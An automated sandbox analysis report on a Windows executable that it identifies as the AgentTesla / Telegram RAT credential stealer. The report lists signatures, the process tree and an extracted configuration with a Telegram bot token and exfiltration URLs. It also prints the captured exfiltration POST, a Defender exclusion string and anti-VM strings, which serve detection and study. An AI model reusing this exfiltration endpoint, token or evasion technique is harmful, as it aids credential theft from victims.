
Windows Analysis Report: remmittance copy.exe

Overview

General Information

Sample Name: remmittance copy.exe
Analysis ID: 510735
MD5: c039d3d94f0cc82369c066e26a67e0f6
SHA1: 79519d3cbee4d7af49cf1572ed9a5fa87b2186fe
SHA256: 219816561a364b4e85a344de1a4d7c7f74a01068f9a51bbb7e3101c9c9dd05ac
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to detect virtual machines (SLDT)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • remmittance copy.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\remmittance copy.exe' MD5: C039D3D94F0CC82369C066E26A67E0F6)
    • remmittance copy.exe (PID: 2248 cmdline: C:\Users\user\Desktop\remmittance copy.exe MD5: C039D3D94F0CC82369C066E26A67E0F6)
    • remmittance copy.exe (PID: 3864 cmdline: C:\Users\user\Desktop\remmittance copy.exe MD5: C039D3D94F0CC82369C066E26A67E0F6)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1373897190", "Chat URL": "https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 17 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.0.remmittance copy.exe.400000.8.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
5.0.remmittance copy.exe.400000.8.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
5.0.remmittance copy.exe.400000.6.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
5.0.remmittance copy.exe.400000.6.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
5.0.remmittance copy.exe.400000.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 10 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 5.0.remmittance copy.exe.400000.10.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1373897190", "Chat URL": "https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument"}
Source: remmittance copy.exe.3864.5.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendMessage"}
Source: 5.0.remmittance copy.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.remmittance copy.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.remmittance copy.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.2.remmittance copy.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.remmittance copy.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.remmittance copy.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: remmittance copy.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: remmittance copy.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d999ffec9f8e5b
    Host: api.telegram.org
    Content-Length: 1004
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49848
Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: http://NoCGvF.com
Source: remmittance copy.exe, 00000005.00000002.925105112.0000000003512000.00000004.00000001.sdmp | String found in binary or memory: http://api.telegram.org
Source: remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org
Source: remmittance copy.exe, 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/
Source: remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument
Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocumentdocument-----
Source: remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org4.l
Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://qEv5A6okmkiAozFZ9P4.org
Source: remmittance copy.exe, 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | HTTP traffic detected:
    POST /bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d999ffec9f8e5b
    Host: api.telegram.org
    Content-Length: 1004
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49848 version: TLS 1.2

System Summary:

.NET source code contains very large array initializations
Source: 5.0.remmittance copy.exe.400000.10.unpack, <PrivateImplementationDetails>{7C91D473-0DDA-4702-9A20-92CE3F18005D}/583F6263-B84E-47F2-98C9-CCA7257F7A36.cs | Large array initialization: .cctor: array initializer size 12005
Source: 5.0.remmittance copy.exe.400000.6.unpack, <PrivateImplementationDetails>{7C91D473-0DDA-4702-9A20-92CE3F18005D}/583F6263-B84E-47F2-98C9-CCA7257F7A36.cs | Large array initialization: .cctor: array initializer size 12005
Source: 5.0.remmittance copy.exe.400000.8.unpack, <PrivateImplementationDetails>{7C91D473-0DDA-4702-9A20-92CE3F18005D}/583F6263-B84E-47F2-98C9-CCA7257F7A36.cs | Large array initialization: .cctor: array initializer size 12005
Source: remmittance copy.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: remmittance copy.exe, 00000000.00000000.658275489.000000000071A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFlushWriteAsyncd.exe8 vs remmittance copy.exe
Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameTaskNode.dll4 vs remmittance copy.exe
Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamepkWOHfaeoUgOQtOOIIrYvXqkodqITNMscRuGJ.exe4 vs remmittance copy.exe
Source: remmittance copy.exe, 00000004.00000000.674939754.00000000001AA000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFlushWriteAsyncd.exe8 vs remmittance copy.exe
Source: remmittance copy.exe, 00000005.00000000.678550597.0000000000C8A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFlushWriteAsyncd.exe8 vs remmittance copy.exe
Source: remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamepkWOHfaeoUgOQtOOIIrYvXqkodqITNMscRuGJ.exe4 vs remmittance copy.exe
Source: remmittance copy.exe, 00000005.00000002.923372714.00000000010F8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs remmittance copy.exe
Source: remmittance copy.exe | Binary or memory string: OriginalFilenameFlushWriteAsyncd.exe8 vs remmittance copy.exe
Source: remmittance copy.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: remmittance copy.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ (2 identical events)
Source: C:\Users\user\Desktop\remmittance copy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\remmittance copy.exe 'C:\Users\user\Desktop\remmittance copy.exe'
Source: C:\Users\user\Desktop\remmittance copy.exe | Process created: C:\Users\user\Desktop\remmittance copy.exe C:\Users\user\Desktop\remmittance copy.exe (4 identical events)
Source: C:\Users\user\Desktop\remmittance copy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\remmittance copy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\remmittance copy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (2 identical events)
Source: C:\Users\user\Desktop\remmittance copy.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\remmittance copy.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/1@1/1
Source: C:\Users\user\Desktop\remmittance copy.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 identical events)
Source: remmittance copy.exe | Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: 5.0.remmittance copy.exe.400000.10.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (2 identical events)
Source: 5.0.remmittance copy.exe.400000.6.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (2 identical events)
Source: 5.0.remmittance copy.exe.400000.8.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (2 identical events)
Source: C:\Users\user\Desktop\remmittance copy.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical events)
Source: C:\Users\user\Desktop\remmittance copy.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\remmittance copy.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: remmittance copy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: remmittance copy.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

                      .NET source code contains potential unpackerShow sources
                      Source: remmittance copy.exe, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.2.remmittance copy.exe.6b0000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.0.remmittance copy.exe.6b0000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.remmittance copy.exe.140000.3.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.remmittance copy.exe.140000.1.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.2.remmittance copy.exe.140000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.remmittance copy.exe.140000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.remmittance copy.exe.140000.2.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.13.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.2.remmittance copy.exe.c20000.1.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.3.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.9.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.2.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.1.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_07853D90 push esp; retf
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_07853952 pushfd ; iretd
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC2877 push ebx; ret
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC1B9A push edx; retf
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DD7A37 push edi; retn 0000h
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DE030B push 8BFFFFFFh; retf
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_02FCCF71 push esp; iretd
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_02FCDB4D push FFFFFF8Bh; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.80880242174
                      Source: C:\Users\user\Desktop\remmittance copy.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match | File source: 0.2.remmittance copy.exe.2a2c9d4.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\remmittance copy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\remmittance copy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 6340 | Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 1440 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 588 | Thread sleep time: -11990383647911201s >= -30000s
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 5348 | Thread sleep count: 379 > 30
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 5348 | Thread sleep count: 9484 > 30
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Window / User API: threadDelayed 379
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Window / User API: threadDelayed 9484
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Code function: 0_2_006B7AAF sldt word ptr [eax]
                      Source: C:\Users\user\Desktop\remmittance copy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\remmittance copy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\remmittance copy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Thread delayed: delay time: 30000
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Thread delayed: delay time: 922337203685477
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp | Binary or memory string: vmware
                      Source: remmittance copy.exe, 00000005.00000002.923688399.000000000136F000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnitoG
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Code function: 5_2_00DC0DF8 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Memory written: C:\Users\user\Desktop\remmittance copy.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Process created: C:\Users\user\Desktop\remmittance copy.exe C:\Users\user\Desktop\remmittance copy.exe
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Process created: C:\Users\user\Desktop\remmittance copy.exe C:\Users\user\Desktop\remmittance copy.exe
                      Source: remmittance copy.exe, 00000005.00000002.924047026.0000000001A90000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                      Source: remmittance copy.exe, 00000005.00000002.924047026.0000000001A90000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: remmittance copy.exe, 00000005.00000002.924047026.0000000001A90000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: remmittance copy.exe, 00000005.00000002.924047026.0000000001A90000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Users\user\Desktop\remmittance copy.exe VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
